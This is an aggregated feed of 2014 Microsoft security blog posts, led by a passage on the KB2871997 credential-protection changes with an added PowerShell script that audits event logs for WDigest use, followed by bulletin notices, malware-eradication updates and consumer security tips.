We recommend you place high value accounts, such as accounts used by server administrators, in the &ldquo;Protected Users&rdquo; group to harden the accounts.</p> <p style="margin-left:30px;">Since a &ldquo;Protected User&rdquo; is restricted to Kerberos authentication they work well with &ldquo;Authentication Policies and Silos&rdquo;, a new feature introduced for Windows 2012R2 functional level domains. Authentication Policies and Silos allow you to place users and computers within a silo and apply policy (such as logon restrictions) to them. More information on &ldquo;Authentication Policies and Silos&rdquo; can be found here: <a href="http://technet.microsoft.com/en-us/library/dn486813.aspx">http://technet.microsoft.com/en-us/library/dn486813.aspx</a>.</p> <p><b>2. Remote Desktop Client support for the Restricted Admin RDP mode</b></p> <p style="margin-left:30px;">Part of Microsoft&rsquo;s official guidance for reducing the risk of lateral movement (or pass-the-hash) attacks is to authenticate to servers using a &ldquo;network logon&rdquo; (a specific Windows logon type). Why? Because when a user authenticates to a remote server using a &ldquo;network logon&rdquo;, the users credential is never sent to the remote server. This means that even if the remote server is compromised, the users credential cannot be captured.</p> <p style="margin-left:30px;">Virtually every management tool Microsoft ships authenticates using &ldquo;network logon&rdquo;. This includes but is not limited to: PowerShell Remoting, WinRM, PSExec, WMI, etc&hellip; Prior to this update, Remote Desktop required the user send their clear-text password to the remote server (encrypted over-the-wire but decrypted on the remote server) so they could log on for an interactive session. 
With this update, it is now possible to use Remote Desktop without sending credentials to the remote server.</p> <p style="margin-left:30px;">Note that this update back-ports changes to the Remote Desktop client, not the Remote Desktop server. This means you can make Restricted Admin connections from an updated system, but only to a Windows 8.1 or Windows Server 2012 R2 system.</p> <p style="margin-left:30px;">Only administrators can use the &ldquo;Restricted Admin&rdquo; mode; members of the &ldquo;Remote Desktop Users&rdquo; group are not allowed to use it. Because the user&rsquo;s credential is not sent to the remote system, it is impossible for the user to make authenticated connections from the remote system to other systems. Since the user connecting to the system is an administrator (and can, by design, impersonate other users on the system), we have made Restricted Admin connections automatically impersonate the computer account for remote connections. This allows a Restricted Admin to access network resources such as shares as long as the computer account has access.</p> <p style="margin-left:30px;">Microsoft recommends that Restricted Admin is used whenever possible, as this follows the &ldquo;least privilege&rdquo; principle. If you are authenticating to a server (even a highly trusted server) and do not need to &ldquo;double hop&rdquo; with your privileged account, it is recommended you use Restricted Admin. One common scenario that will greatly benefit from Restricted Admin is the &ldquo;helpdesk scenario&rdquo;, where a helpdesk agent uses Remote Desktop with a privileged account to repair user workstations.</p> <p style="margin-left:30px;">Restricted Admin can be used by starting Remote Desktop as follows:</p> <p style="margin-left:30px;">Mstsc.exe /restrictedadmin</p> <p><b>3. LSA Credential Cleanup &amp; Other Changes</b></p> <p style="margin-left:30px;"><b>a. 
Removal of credentials after logoff</b></p> <p style="margin-left:60px;">As outlined in Microsoft&rsquo;s <a href="http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf" title="Pass-the-hash whitepaper">Pass-the-hash whitepaper</a>, Windows caches the credentials of a user in the LSASS process whenever the user logs in. This includes the user&rsquo;s clear-text password, the user&rsquo;s NT/LM password hash, and the user&rsquo;s Kerberos TGT/session key. When the user logs off, the credentials should be cleared out of memory. Prior to this update, this was not always the case. The issue preventing credentials from being cleared is now fixed: credentials will always be cleared from memory after a user logs off.</p> <p style="margin-left:30px;"><b>b. New well-known SIDs</b></p> <p style="margin-left:60px;">This update adds support for two new well-known SIDs:</p> <ol> <li style="margin-left:30px;"><strong>LOCAL_ACCOUNT</strong> &ndash; Any local account will inherit this SID</li> <li style="margin-left:30px;"><strong>LOCAL_ACCOUNT_AND_MEMBER_OF_ADMINISTRATORS_GROUP</strong> &ndash; Any local account that is a member of the Administrators group will inherit this SID</li> </ol> <p style="margin-left:60px;">These SIDs were introduced to make it easier to prevent local accounts from being used over the network (something attackers commonly do when performing pass-the-hash attacks). An administrator can configure the Group Policy settings &ldquo;Deny access to this computer from the network&rdquo; and &ldquo;Deny log on through Remote Desktop Services&rdquo; using the above SIDs to prevent attackers from using local accounts over the network. 
More information on these settings (and detailed instructions) can be found in Microsoft&rsquo;s Pass-the-Hash whitepaper.</p> <p style="margin-left:30px;"><b>c. Removal of clear-text credentials from LSASS</b></p> <p style="margin-left:60px;">As noted previously, one of the credentials stored by LSASS is the user&rsquo;s clear-text password. This update prevents every Microsoft SSP in LSASS, besides WDigest, from storing the user&rsquo;s clear-text password. WDigest still stores the user&rsquo;s clear-text password because it cannot function without it (Microsoft does not want to break existing customer setups by shipping an update that disables WDigest). Microsoft recommends that customers look through their domain controller logs for Digest authentication logons (instructions provided below); if Digest authentication is not being used, customers can apply the FixIt found in the <a href="http://support.microsoft.com/kb/2871997" title="KB article">KB article</a> to disable WDigest. Doing this will eliminate all clear-text credentials from LSASS memory.</p> <p style="margin-left:60px;">It&rsquo;s important to realize that while clear-text credentials will no longer be stored, the NT hash and Kerberos TGT/session key will still be stored and are themselves credentials (without credential equivalents in memory, single sign-on would be impossible). Additionally, even though clear-text credentials are no longer stored in memory, an attacker can use other techniques, such as key loggers, to recover clear-text passwords. 
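The log review recommended above, as an added PowerShell example that is not part of the original post: it queries Event ID 4776 on the domain controllers and Event ID 4624 on each server (the two events the next section shows) and keeps only those whose Authentication Package field reads WDigest, so you can see which accounts and hosts still rely on Digest authentication before applying the FixIt. The host names and the 30-day window are placeholders; the EventData field names (PackageName for 4776, AuthenticationPackageName for 4624) are read from the event XML.

```powershell
# Added example (not part of the original post): survey the Security logs for
# WDigest authentications before applying the KB2871997 FixIt that disables WDigest.
# Assumptions: the account running this can read the remote Security logs, and
# $DomainControllers / $Servers are placeholder host names to replace with your own.
param(
    [string[]]$DomainControllers = @('DC01'),    # placeholder
    [string[]]$Servers           = @('SRV01'),   # placeholder
    [datetime]$Since             = (Get-Date).AddDays(-30)
)

# Read one named field from the EventData section of an event's XML.
function Get-EventField {
    param($Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# Return the events of one ID on one host whose package field reads "WDigest".
# 4776 carries the package in "PackageName"; 4624 in "AuthenticationPackageName".
function Find-WDigestEvents {
    param([string]$Computer, [int]$EventId, [string]$PackageField)
    $filter = @{ LogName = 'Security'; Id = $EventId; StartTime = $Since }
    try {
        $events = Get-WinEvent -ComputerName $Computer -FilterHashtable $filter -ErrorAction Stop
    } catch {
        # Get-WinEvent raises an error when nothing matches; treat that as "no events".
        return @()
    }
    foreach ($e in $events) {
        if ((Get-EventField $e $PackageField) -eq 'WDigest') { $e }
    }
}

$findings = @()

# Domain controllers: 4776 is logged once per credential validation.
foreach ($dc in $DomainControllers) {
    foreach ($e in Find-WDigestEvents -Computer $dc -EventId 4776 -PackageField 'PackageName') {
        $findings += [pscustomobject]@{
            Host    = $dc
            EventId = 4776
            Time    = $e.TimeCreated
            Account = Get-EventField $e 'TargetUserName'
            From    = Get-EventField $e 'Workstation'
            Detail  = 'Status ' + (Get-EventField $e 'Status')
        }
    }
}

# Member servers: 4624 shows which server accepted the Digest logon and its logon type.
foreach ($srv in $Servers) {
    foreach ($e in Find-WDigestEvents -Computer $srv -EventId 4624 -PackageField 'AuthenticationPackageName') {
        $findings += [pscustomobject]@{
            Host    = $srv
            EventId = 4624
            Time    = $e.TimeCreated
            Account = '{0}\{1}' -f (Get-EventField $e 'TargetDomainName'), (Get-EventField $e 'TargetUserName')
            From    = Get-EventField $e 'IpAddress'
            Detail  = 'LogonType ' + (Get-EventField $e 'LogonType')
        }
    }
}

if ($findings.Count -eq 0) {
    "No WDigest authentications since $Since on the hosts checked; disabling WDigest should be safe."
} else {
    $findings | Sort-Object Time | Format-Table -AutoSize
    "WDigest is still in use by the accounts above; move them off Digest authentication before disabling it."
}
```

Run it once per domain with every member server listed, since the post notes that 4624 must be checked on all servers; a quiet result over a window that covers your normal business cycle is the evidence you want before disabling WDigest.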
Eliminating clear-text passwords from memory is useful and reduces risk, but it is not guaranteed to stop attackers.</p> <h2>Identifying WDigest use:</h2> <p>WDigest use can be identified in two places: your domain controller logs, or your server logs (every server must be checked). In both cases the field to look at is the Authentication Package (highlighted below).</p> <p><b>1. Domain Controller Security Event Logs: Event ID 4776</b></p> <pre><span style="background-color:#ffff00;">Authentication Package:   WDigest</span>
Logon Account:            Administrator
Source Workstation:       WIN2K12R2CLIENT
Error Code:               0x0</pre> <p><b>2. Server Security Event Logs: Event ID 4624 (must be checked on all servers)</b></p> <pre>An account was successfully logged on.

Subject:
    Security ID:              NULL SID
    Account Name:             -
    Account Domain:           -
    Logon ID:                 0x0

Logon Type:                   3

Impersonation Level:          Impersonation

New Logon:
    Security ID:              TESTLAB\administrator
    Account Name:             Administrator
    Account Domain:           TESTLAB
    Logon ID:                 0x2D8B63
    Logon GUID:               {00000000-0000-0000-0000-000000000000}

Process Information:
    Process ID:               0x0
    Process Name:             -

Network Information:
    Workstation Name:         -
    Source Network Address:   ::1
    Source Port:              57514

Detailed Authentication Information:
    Logon Process:            WDIGEST
<span style="background-color:#ffff00;">    Authentication Package:   WDigest</span>
    Transited Services:       -
    Package Name (NTLM only): -
    Key Length:               0</pre> <p><b>- Joe Bialek, MSRC Engineering</b></p><div style="clear:both;"></div> Regional Threat Assessments: New Interactive Capabilitieshttp://blogs.technet.com/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspxThu, 05 Jun 2014 16:59:11 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:6b030a26-083c-426d-ae95-746337e1cf64Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3632158http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3632158http://blogs.technet.com/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspx#comments<p>If you follow our blog, then you are likely aware that we recently released Volume 16 of the Microsoft Security Intelligence Report.&nbsp; What you may not be aware of is that with this release, we overhauled the <a href="http://www.microsoft.com/security/sir/threat/default.aspx">Regional Threat Assessment </a>section of our website to give visitors a much more robust interactive digital experience. This blog post is intended to provide a summary of the enhancements that are now available. 
<a href="/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/05/regional-threat-assessments-new-interactive-capabilities.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632158&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Regional Threat AssessmentsMicrosoft Security Intelligence ReportSIR Advance Notification Service for the June 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/06/05/advance-notification-service-for-the-june-2014-security-bulletin-release.aspxThu, 05 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:de6d16fe-84bd-46f3-a3b8-54ce6cc49476Dustin C. Childs0<p><span style="font-size:medium;">Today we provide </span><a href="http://technet.microsoft.com/security/bulletin/MS14-jun"><span style="color:#0563c1;font-size:medium;">advance notification</span></a><span style="font-size:medium;"> for the release of seven Bulletins, two rated Critical and five rated Important in severity. These Updates are for Microsoft Windows, Microsoft Office and Internet Explorer. The Update for Internet Explorer addresses </span><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1770"><span style="color:#0563c1;font-size:medium;">CVE-2014-1770</span></a><span style="font-size:medium;">, which we have not seen used in any active attacks.</span></p> <p><span style="font-size:medium;">Also, in case you missed it, last month we released <a href="https://technet.microsoft.com/library/security/2871997.aspx"><span style="color:#0563c1;">Security Advisory 2871997</span></a> to further enhance credentials management and protections on Windows 7, Windows 8, Windows Server 2008 R2, and Windows Server 2012. &nbsp;Since then, we have received some questions about the functionality changes introduced by the advisory. 
&nbsp;Over on the Security Research &amp; Defense (SRD) <a href="http://blogs.technet.com/b/srd/archive/2014/06/05/an-overview-of-kb2871997.aspx"><span style="color:#0563c1;">blog</span></a>, Joe Bialek from the MSRC Engineering team provides an overview of those changes, their impact, and some other important configuration changes that can be made in conjunction with the update to further improve system security. &nbsp;I recommend you take a few moments to read the SRD blog and consider implementing some or all of the changes in your environment.</span></p> <p><span style="font-size:medium;">As always, we&rsquo;ve scheduled the Security Bulletin release for the second Tuesday of the month, June 10, 2014, at approximately 10:00 a.m. PDT. &nbsp;Revisit this blog then for analysis of the relative risk and impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s Updates. &nbsp;Until then, please review the </span><a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-jun"><span style="color:#0563c1;font-size:medium;">ANS summary page</span></a><span style="font-size:medium;"> for more information to help you prepare for Security Bulletin testing and deployment.</span></p> <p><span style="font-size:medium;">Don&rsquo;t forget, you can also follow the MSRC team&rsquo;s recent activity on Twitter at </span><a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;font-size:medium;">@MSFTSecResponse</span></a><span style="font-size:medium;">.&nbsp;</span></p> <p><span style="font-family:Times New Roman;font-size:medium;"> </span><span style="font-size:medium;">Thank you, </span><br /><span style="font-size:medium;"> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><br /><span style="font-size:medium;"> Group Manager, Response Communications</span><br /><span style="font-size:medium;"> 
Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632222&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Windowsmonthly bulletin releaseANSInternet Explorer (IE) Dasher Software Remains an Amazing Alternative to Traditional On-Screen Keyboardhttp://blogs.msdn.com/b/accessibility/archive/2014/06/05/dasher-software-remains-an-amazing-alternative-to-traditional-on-screen-keyboard.aspxThu, 05 Jun 2014 13:01:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530679Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10530679http://blogs.msdn.com/b/accessibility/archive/2014/06/05/dasher-software-remains-an-amazing-alternative-to-traditional-on-screen-keyboard.aspx#commentsThe following blog post was written by Erin Beneteau, a senior learning and development strategist for accessibility at Microsoft. Erin has worked in the field of assistive technology for over 15 years. ----- I remember watching the demonstrator...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/05/dasher-software-remains-an-amazing-alternative-to-traditional-on-screen-keyboard.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530679" width="1" height="1"> Update on malware eradication "sandbox"http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/04/update-on-malware-eradication-quot-sandbox-quot.aspxWed, 04 Jun 2014 16:38:31 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:fff61095-9a23-4468-ad74-825b91462991Trusted Cloud Team0<p><strong>By TwC Staff</strong></p> <p>A couple months back, we wrote about plans to create a &ldquo;sandbox&rdquo; where antimalware industry experts and other security professionals can work together to <a target="_blank" href="/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">move beyond disrupting malware</a> to actually eradicating it. 
It&rsquo;s a lofty goal, and one that we believe can change the game.&nbsp; <a href="/b/trustworthycomputing/archive/2014/06/03/update-on-malware-eradication-quot-sandbox-quot.aspx" target="_blank">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/04/update-on-malware-eradication-quot-sandbox-quot.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632061&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1"> Coordinated malware eradication nears launchhttp://blogs.technet.com/b/mmpc/archive/2014/06/04/coordinated-malware-eradication-nears-launch.aspxWed, 04 Jun 2014 15:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3d28d70a-bdd3-4c25-ac4d-19e663cb63bfmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/04/coordinated-malware-eradication-nears-launch.aspx#comments<div class="ExternalClassEE3519C44964459D8058D695602641C8"> <p>​Good news: the <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx">coordinated malware eradication</a> preparations are almost done.&nbsp; We have held several roundtable meetings at industry events around the world, and <a href="#upcoming">the last two</a> are scheduled for June and July. We had insightful conversations with a diverse group of experts from across the antimalware industry. The ideas have converged into a shared vision of how we&rsquo;ll work together to put pressure on the malware ecosystem. I am excited for the first coordinated eradication campaigns to launch!</p> <p>Discussions have given the industry a place to talk about how coordination happens today. Data-sharing partnerships are becoming more common, and the resulting campaigns are paying off. 
As you might imagine, this has led some roundtable participants to ask us to explain why coordinated malware eradication is necessary.</p> <p>Our response is simple: We&rsquo;ve learned from experience that the amount of time and effort required just to plan, execute, and measure each antimalware campaign is daunting. Our roundtable discussions have shown that others are feeling this too. Coordinated malware eradication can reduce this drag on efficiency.</p> <p>I think the appeal of this drag reduction is why there&rsquo;s been such great engagement. We recently talked with the Asia-Pacific Computer Emergency Response Team (APCERT). APCERT is working to increase transparency and the use of common measurements through a project named Cyber Green.&nbsp; Like us, they believe that getting closer to malware eradication requires a wide range of individuals and organizations to get involved and work together.</p> <p>Yurie Ito, Chair of the Steering Committee for APCERT said, &ldquo;What we have been discussing around coordinated malware eradication is very complimentary to the driving concepts behind Cyber Green. 
There are huge benefits to working together to increase visibility into the sources and presence of cyber risks.&nbsp; Fix this, and we go a long way to making the Internet a stronger, more resilient and safer place.&rdquo;</p> <p>Here&rsquo;s a short list of areas that we&rsquo;ve heard cause the most drag on antimalware campaign efficiency:</p> <ul> <li><strong>Incomplete contact lists:</strong> There is no simple and commonly available way to find, and then reach, the right person inside each of our organizations.&nbsp;</li> <li><strong>Missing patterns:</strong> We lack standard recipes and templates for running eradication campaigns, and find ourselves rebuilding these from the ground up each time.</li> <li><strong>Incomplete measurements:</strong> We each struggle to calculate and track the damage caused by malware, and the impact our eradication efforts make.</li> </ul> <p>What we want to do through coordinated malware eradication is solve these on-going challenges, which should help unleash our industry to focus its efforts on eradication.</p> <p>From our roundtable discussions, an outline is taking shape. Here&rsquo;s how we&rsquo;re thinking about the campaign process. One or more members set an eradication goal, and then they invite others to join them in a campaign. Interested members opt-in and specify their level of commitment. Now formed, the group chooses a leader and begins planning.</p> <p>Once the group defines tactics and metrics, the execution phase begins. 
See details about this step <a href="http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">in my last blog</a>.&nbsp; The short version: a coordinated malware eradication sandbox can help correlate information from all campaign participants, allowing the group to not only measure and correlate better, but precisely target the bad actors&rsquo; weak spots.</p> <p>Having a clear ending for each campaign helps keep the cycles short and the participants focused and motivated. Once the campaign ends and we celebrate another malware eradication, we have an opportunity to review the results and discuss future improvements to the process.&nbsp; At this point, some members might choose to talk publicly about the results and their contribution.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CMEgraphic2.png"><img width="500" alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/CMEgraphic2.png" border="0" /></a></p> <span> <em>Figure 1: An outline of the malware eradication campaign process under discussion</em></span> <p>There has been strong interest in this campaign process and we&rsquo;ll soon host a set of pilot campaigns with current and prospective members of <a href="http://www.microsoft.com/security/Portal/mmpc/via/virus-information-alliance.aspx">Virus Information Alliance</a> (VIA) program.&nbsp; It will be great to be able to eradicate some malware as we learn from what works. In the meantime, we welcome your feedback. 
The more engagement the better!</p> <p><em>Dennis Batchelder</em><br /><em>Partner PM Manager </em><br /><em>MMPC</em></p> <p><strong><a id="upcoming"></a>Upcoming engagement options</strong></p> <ul> <li>26th Annual FIRST Conference, June 22, 2014 &ndash; June 27, 2014 Boston, Massachusetts, USA.</li> <li>Microsoft Security Research Alliance Summit, July 22, 2014 &ndash; July 24, 2014 Seattle, Washington, USA.</li> </ul> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632064&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> A Blind Accessibility Engineer Switches from a Mac System to Microsoft Windowshttp://blogs.msdn.com/b/accessibility/archive/2014/06/03/a-blind-accessibility-engineer-switches-from-a-mac-system-to-microsoft-windows.aspxTue, 03 Jun 2014 21:01:27 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530678Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10530678http://blogs.msdn.com/b/accessibility/archive/2014/06/03/a-blind-accessibility-engineer-switches-from-a-mac-system-to-microsoft-windows.aspx#commentsAfter five years with a Mac-based system, a veteran of the accessible technology industry switched back to Windows. 
Marco, who has been blind his entire life and uses screen readers, made the move, in part, because his Apple system didn&rsquo;t have steady...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/03/a-blind-accessibility-engineer-switches-from-a-mac-system-to-microsoft-windows.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530678" width="1" height="1"> The University’s Role in Addressing the Future of Cybersecurityhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/06/03/the-university-s-role-in-the-addressing-future-of-cybersecurity.aspxTue, 03 Jun 2014 15:18:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:ef2f2a84-6e5a-49b4-ad52-bac7743ea9aaTrusted Cloud Team0<p><strong>By Scott Charney, Corporate Vice President, Trustworthy Computing</strong><br /><br />In the past few years, I have visited a number of universities to address multi-disciplinary audiences on the challenges of cyber security and privacy.&nbsp; Most recently, I visited both the University of Washington and Stanford University, the former to teach a course on cybersecurity and cybercrime; the latter to connect with students and faculty on security, privacy, and big data. 
<a href="/b/trustworthycomputing/archive/2014/05/30/the-university-s-role-in-the-addressing-future-of-cybersecurity.aspx" target="_blank">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/03/the-university-s-role-in-the-addressing-future-of-cybersecurity.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3631844&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">threat landscapeSTEMcyber threatsscott charneyTrustTechnologyCybersecurityExpert OpinionsSecurity ResearchSecurityresearchcyber securityTrustworthy ComputingMicrosoftsecurity community Help dad with privacy and security this Father’s Dayhttp://blogs.msdn.com/b/securitytipstalk/archive/2014/06/02/help-dom-with-privacy-and-security-this-father-s-day.aspxMon, 02 Jun 2014 19:26:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530322Eve Blakemore6http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10530322http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/02/help-dom-with-privacy-and-security-this-father-s-day.aspx#comments<p>If you want to give your dad something really useful this Father&rsquo;s Day (June 15), help him tune up his PC and give him a few tips on how to increase his privacy and security online.</p> <h1>Get smart about passwords</h1> <p>Strong passwords help protect you against hackers and other cybercriminals. 
But even if your dad uses long combinations of letters, numbers, and other special characters to protect his email password or other online accounts, he could still be vulnerable if he doesn&rsquo;t follow this guidance:</p> <ul> <li>Use different passwords for different accounts.</li> <li>Change your passwords often.</li> <li>Don&rsquo;t share your passwords with anyone.</li> <li>Don&rsquo;t send passwords or user names over email.</li> </ul> <p>For more information on how to use passwords to increase your safety, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/passwords-create.aspx">Create strong passwords</a>&nbsp;and <a href="http://www.microsoft.com/security/pc-security/protect-passwords.aspx">Protect your passwords</a>.</p> <h1>Learn to recognize scams</h1> <p>If your dad uses email, text messaging, or social networking websites, he&rsquo;s probably encountered scams. If he knows the signs of a scam, he&rsquo;s less likely to fall for them.</p> <p><strong>Scams can contain the following:</strong></p> <ul> <li>Random links that appear to come from someone in your contact list</li> <li>Alarmist messages and threats of account closures</li> <li>Promises of money for little or no effort</li> <li>Deals that sound too good to be true</li> <li>Requests to donate to a charitable organization after a disaster that has been in the news</li> <li>Bad grammar and misspellings</li> </ul> <p>For more information, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx">How to recognize phishing email messages, links, or phone calls</a>.</p> <h1>Get security updates automatically</h1> <p>One of the best ways to protect your dad from Internet threats is by making sure he&rsquo;s getting all the latest security updates for his operating system and other software.</p> <p>Microsoft releases&nbsp;<a href="http://www.microsoft.com/security/pc-security/updates-faq.aspx">security updates</a>&nbsp;on the second Tuesday of every 
month. Open&nbsp;<a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Windows Update</a>&nbsp;to confirm that your dad has automatic updating turned on and that he's downloaded and installed all the latest critical and security updates.</p> <p><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn more about how to get security updates automatically</a></p> <p>If your dad still uses Windows XP, he&rsquo;s no longer receiving security updates. Encourage him to upgrade his operating system or buy a new PC.&nbsp;<a href="http://www.microsoftstore.com/store/msusa/en_US/cat/categoryID.67770000/offerID.42494569909?siteID=Emv4RLEHREc-zzWiHukG3X4YHaoVYBzXZQ#shop-computers&amp;siteID=Emv4RLEHREc-auRvW0feiBW8W8bQaqaCSg">You or your dad might be able to save $100 on a new computer today.</a></p> <p>&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530322" width="1" height="1">securityFather's Day Microsoft Digital Crimes Unit Partners with FBI to Fight Zeus Malwarehttp://blogs.technet.com/b/security/archive/2014/06/02/microsoft-digital-crimes-unit-partners-with-fbi-to-fight-zeus-malware.aspxMon, 02 Jun 2014 17:04:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3bc59749-5f8f-439e-b5bb-1fa6f00fc931Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3631886http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3631886http://blogs.technet.com/b/security/archive/2014/06/02/microsoft-digital-crimes-unit-partners-with-fbi-to-fight-zeus-malware.aspx#comments<p>Today the FBI announced the disruption of GameOver Zeus, a variant of the infamous Zeus family of malware. As part of this action, Microsoft&rsquo;s <a href="/b/microsoft_blog/archive/2014/06/02/microsoft-helps-fbi-in-gameover-zeus-botnet-cleanup.aspx">Digital Crimes Unit </a>worked with&nbsp;the FBI and industry partners to remove the malware so that infected computers can no longer be used for harm. 
Zeus, also known as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fZbot">Win32/Zbot</a>, is a family of trojans designed to steal personal and financial information and to give attackers access to and control of compromised systems; it has also been used to spread ransomware.</p>
<p>You can get all the details of this effort right from the <a href="/b/microsoft_blog/archive/2014/06/02/microsoft-helps-fbi-in-gameover-zeus-botnet-cleanup.aspx">Microsoft Digital Crimes Unit</a>.</p>
...(<a href="http://blogs.technet.com/b/security/archive/2014/06/02/microsoft-digital-crimes-unit-partners-with-fbi-to-fight-zeus-malware.aspx">read more</a>)

Cyberspace 2025: Today's Decisions, Tomorrow's Terrain
http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/02/envisioning-cyberspace-in-2025.aspx
Mon, 02 Jun 2014 15:52:19 GMT (Trusted Cloud Team)
<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p>
<p>What does the future look like? To take a closer look, Microsoft has released a report called &ldquo;<a target="_blank" href="http://download.microsoft.com/download/C/7/7/C7775937-748E-4E95-85FB-24581F16B588/Cyberspace%202025%20Today%E2%80%99s%20Decisions,%20Tomorrow%E2%80%99s%20Terrain.pdf">Cyberspace 2025: Today&rsquo;s Decisions, Tomorrow&rsquo;s Terrain</a>.&rdquo; How will the choices organizations make at present affect their ability to shape the social, economic and demographic changes a decade from now? <a target="_blank" href="/b/trustworthycomputing/archive/2014/05/30/envisioning-cyberspace-in-2025.aspx">See more &gt;&gt;</a></p>
...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/02/envisioning-cyberspace-in-2025.aspx">read more</a>)

It’s time to install Windows 8.1
http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/29/it-s-time-to-install-windows-8-1.aspx
Thu, 29 May 2014 17:27:00 GMT (Eve Blakemore)
<p>If your computer is running Windows 8, it&rsquo;s time to download and install the newest version&mdash;Windows 8.1.</p>
<p>Windows 8.1 Update (also known as KB 2919355) helps your computer run at optimal performance and includes new features that make the operating system easier to use.
If you don&rsquo;t install Windows 8.1, or if you uninstall it, you might not get future bug fixes, security updates, and new features.</p>
<p>If your computer is set to <a href="http://www.microsoft.com/security/pc-security/updates.aspx">receive updates automatically</a>, you don&rsquo;t need to do anything.</p>
<p>To see if you&rsquo;re running the latest update, see <a href="http://windows.microsoft.com/en-us/windows/which-operating-system">Which Windows operating system am I running?</a> To install the latest update, see <a href="http://windows.microsoft.com/en-us/windows-8/install-latest-update-windows-8-1">Install the latest Windows 8.1 Update</a>.</p>

New “myBulletins” Online Service: Delivering Security Bulletins, Tailored for your Organization
http://blogs.technet.com/b/security/archive/2014/05/28/new-mybulletins-tool-delivering-security-bulletins-tailored-for-your-organization.aspx
Wed, 28 May 2014 16:04:43 GMT (Tim Rains - Microsoft)
<p>If you&rsquo;re an IT Professional then you know it can be challenging to keep all of the applications running in your environment up to date, especially with the rapid growth of applications coming online and the consumerization of IT. Despite the challenges, running up-to-date software is a critical part of a holistic security strategy that protects against cybercriminal activity that can lead to data loss, financial theft, public defacement, etc. To help make the security update assessment and deployment process easier for organizations, in 2003 we started &ldquo;Update Tuesday,&rdquo; a predictable cycle in which security updates for Microsoft products and services are provided to customers on the second Tuesday of each month. The feedback by customers to date has been extremely favorable &ndash; this predictable monthly cycle has helped them plan and resource their security update deployments in a more structured and predictable way.</p>
